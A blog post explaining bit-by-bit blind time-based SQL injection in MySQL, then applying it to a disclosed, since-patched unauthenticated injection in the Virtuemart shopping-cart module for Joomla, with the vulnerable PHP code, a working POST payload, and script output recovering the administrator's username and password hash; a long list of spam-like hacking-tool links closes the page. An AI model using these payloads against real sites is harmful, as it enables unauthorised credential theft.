Total Pageviews

Tuesday, 25 August 2020

Bit Banging Your Database

This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work just fine. For instance when dealing with a blind time based sql injection. To bring anyone who is not aware of what a "blind time based" sql injection is up to speed - this is a condition where it is possible to inject into a sql statement that is executed by the database, but the application gives no indication about the result of the query. This is normally exploited by injecting boolean statements into a query and making the database pause for a determined about of time before returning a response. Think of it as playing a game "guess who" with the database.

Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:
select length(username) from jos_users where usertype = 'Super Administrator';
Because we can't return the value back directly we have to make a query like the following iteratively:

select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We would keep incrementing the number we compare the length of the username to until the database paused (benchmark function hit). In this case it would be 5 requests until our statement was true and the benchmark was hit. 

Examples showing time difference:
 mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)
mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
Now in the instance of the password, the field is 65 characters long, so it would require 65 requests to discover the length of the password using this same technique. This is where we get to the topic of the post, we can actually determine the length of any field in only 8 requests (up to 255). By querying the value bit by bit we can determine if a bit is set or not by using a boolean statement again. We will use the following to test each bit of our value: 

Start with checking the most significant bit and continue to the least significant bit, value is '65':
value & 128 
01000001
10000000
-----------
00000000 

value & 64
01000001
01000000
-----------
01000000
value & 32
01000001
00100000
-----------
00000000
value & 16
01000001
00010000
--------
00000000
value & 8
01000001
00001000
--------
00000000

value & 4
01000001
00000100
-----------
00000000
value & 2
01000001
00000010
-----------
00000000
value & 1
01000001
00000001
-----------
00000001
The items that have been highlighted in red identify where we would have a bit set (1), this is also the what we will use to satisfy our boolean statement to identify a 'true' statement. The following example shows the previous example being executed on the database, we identify set bits by running a benchmark to make the database pause:

mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)
mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (8.74 sec)
As you can see, whenever we satisfy the boolean statement we get a delay in our response, we can mark that bit as being set (1) and all others as being unset (0). This gives us 01000001 or 65. Now that we have figured out how long our target value is we can move onto extracting its value from the database. Normally this is done using a substring function to move through the value character by character. At each offset we would test its value against a list of characters until our boolean statement was satisfied, indicating we have found the correct character. Example of this:

select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;
This works but depending on how your character set that you are searching with is setup can effect how many requests it will take to find a character, especially when considering case sensitive values. Consider the following password hash:
da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
If you searched for this string a character at a time using the following character scheme [0-9A-Za-z] it would take about 1400 requests. If we apply our previous method of extracting a bit at a time we will only make 520 requests (65*8). The following example shows the extraction of the first character in this password:

mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.93 sec)
mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
Again I have highlighted the requests where the bit was set in red. According to these queries the value is 01100100 (100) which is equal to 'd'. The offset of the substring would be incremented and the next character would be found until we reached the length of the value that we found earlier.

Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :


          if($order_id === "" || $order_id === null)
          {
                        $vmLogger->debug("Could not find order ID via invoice");
                        $vmLogger->debug("Trying to get via TransactionID: ".$txn_id);
                        $qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
                        $db->query($qv);
                        print($qv);
                        if( !$db->next_record()) {
                                $vmLogger->err("Error: No Records Found.");
                        }
The $txn_id variable is set by a post variable of the same name. The following example will cause the web server to delay before returning:


POST /administrator/components/com_virtuemart/notify.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#  
Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:
python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
The "vm_own.py" script can be downloaded here.


Related links

  1. Hacking Tools For Windows
  2. World No 1 Hacker Software
  3. Hacking Tools Pc
  4. Pentest Recon Tools
  5. Hack Tools 2019
  6. Hack Tools
  7. Best Hacking Tools 2020
  8. Hacking Tools Download
  9. Install Pentest Tools Ubuntu
  10. Blackhat Hacker Tools
  11. Pentest Tools Review
  12. Pentest Tools For Android
  13. Underground Hacker Sites
  14. Hacking Tools For Beginners
  15. Hacker Tools Free Download
  16. Hacking Tools For Beginners
  17. Hacking Tools Windows
  18. Computer Hacker
  19. What Is Hacking Tools
  20. Hacker
  21. Pentest Tools Subdomain
  22. Tools For Hacker
  23. Hacking Tools Windows
  24. Tools For Hacker
  25. Hacker Search Tools
  26. Nsa Hack Tools
  27. Pentest Recon Tools
  28. Blackhat Hacker Tools
  29. What Is Hacking Tools
  30. Black Hat Hacker Tools
  31. Ethical Hacker Tools
  32. Hacking Tools Windows
  33. Hacking Tools For Windows Free Download
  34. Hacker Tools Free
  35. Pentest Tools Open Source
  36. Hacking Tools For Pc
  37. Beginner Hacker Tools
  38. Beginner Hacker Tools
  39. Pentest Tools Github
  40. Hack App
  41. Hack Tools For Games
  42. What Are Hacking Tools
  43. Growth Hacker Tools
  44. Hacker Tools Github
  45. Computer Hacker
  46. Hacker Tools Hardware
  47. Hacking App
  48. Hacker Tools 2019
  49. Hacker Tools For Mac
  50. Hacking Tools Hardware
  51. Hacker Tools 2020
  52. Github Hacking Tools
  53. Hacker Search Tools
  54. Termux Hacking Tools 2019
  55. Install Pentest Tools Ubuntu
  56. Hacking Tools For Windows 7
  57. Hack Tools 2019
  58. Hacking Tools Name
  59. Pentest Tools For Mac
  60. Pentest Tools Url Fuzzer
  61. What Are Hacking Tools
  62. Hacker Tools Apk
  63. Hack Tools Github
  64. Pentest Tools Online
  65. Pentest Tools Website Vulnerability
  66. Hack Tools 2019
  67. Hack Rom Tools
  68. Hacking Tools Mac
  69. Free Pentest Tools For Windows
  70. Hacking Tools For Games
  71. Hack Tools For Ubuntu
  72. Hack Tools Mac
  73. Hacking Tools And Software
  74. What Are Hacking Tools
  75. Pentest Tools
  76. Hacking Tools Download
  77. Nsa Hack Tools
  78. Computer Hacker
  79. Hacker Tools
  80. Hacker Security Tools
  81. Hacking Tools For Windows Free Download
  82. Pentest Tools Github
  83. Pentest Tools Kali Linux
  84. Hacking Tools 2019
  85. Hack Tools 2019
  86. Hacker Tools
  87. Pentest Tools Review
  88. Termux Hacking Tools 2019
  89. Pentest Tools Website
  90. Ethical Hacker Tools
  91. Hack Tools Mac
  92. Hacking Tools Online
  93. Pentest Tools Alternative
  94. Game Hacking
  95. Pentest Tools Find Subdomains
  96. Hacking Tools For Beginners
  97. Nsa Hacker Tools
  98. Hack Tools Mac
  99. Tools Used For Hacking
  100. Hack Tools For Windows
  101. Pentest Tools Url Fuzzer
  102. Hacking Tools For Kali Linux
  103. Hackrf Tools
  104. Hacking Tools For Beginners
  105. Tools Used For Hacking
  106. Pentest Automation Tools
  107. Growth Hacker Tools
  108. Hacking Tools For Kali Linux
  109. Pentest Tools Kali Linux
  110. Pentest Box Tools Download
  111. Hacking Tools
  112. Hacker Search Tools
  113. Pentest Tools Kali Linux
  114. Hacker Tools Windows
  115. Pentest Tools Review
  116. Hacker Tool Kit
  117. Hacking Tools Kit
  118. Hacker Tools Online
  119. Wifi Hacker Tools For Windows
  120. How To Make Hacking Tools
  121. Pentest Tools Windows
  122. Hack Tools Github
  123. Best Hacking Tools 2020
  124. Pentest Tools Website
  125. Hack Tool Apk No Root
  126. Hacker Tools Free Download
  127. Hacking Tools Usb
  128. Pentest Tools For Windows
  129. Computer Hacker
  130. Hacker Tools Free
  131. How To Make Hacking Tools
  132. Hacker Search Tools
  133. Hack Tools For Games
  134. Pentest Tools Open Source
  135. Hacker Search Tools
  136. Install Pentest Tools Ubuntu
  137. Hacking App
  138. Hacker Tools Free Download
  139. Hacker Techniques Tools And Incident Handling
  140. Nsa Hack Tools Download
  141. How To Hack
  142. Pentest Tools For Mac
  143. Pentest Tools Github
  144. Hack Tools Pc
  145. Hackrf Tools
  146. How To Install Pentest Tools In Ubuntu
  147. Hacker Tools Linux
  148. Pentest Tools Tcp Port Scanner
  149. Hacking App
  150. Pentest Tools Free
  151. Pentest Tools For Mac
  152. Hacking Tools Kit
  153. Hacker Tools Linux
  154. How To Hack
  155. Android Hack Tools Github
  156. What Is Hacking Tools
  157. Hack Website Online Tool
  158. Hackrf Tools
  159. Pentest Tools Find Subdomains
  160. Termux Hacking Tools 2019
  161. Computer Hacker
  162. Hacker
  163. Hacker Tools Linux
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)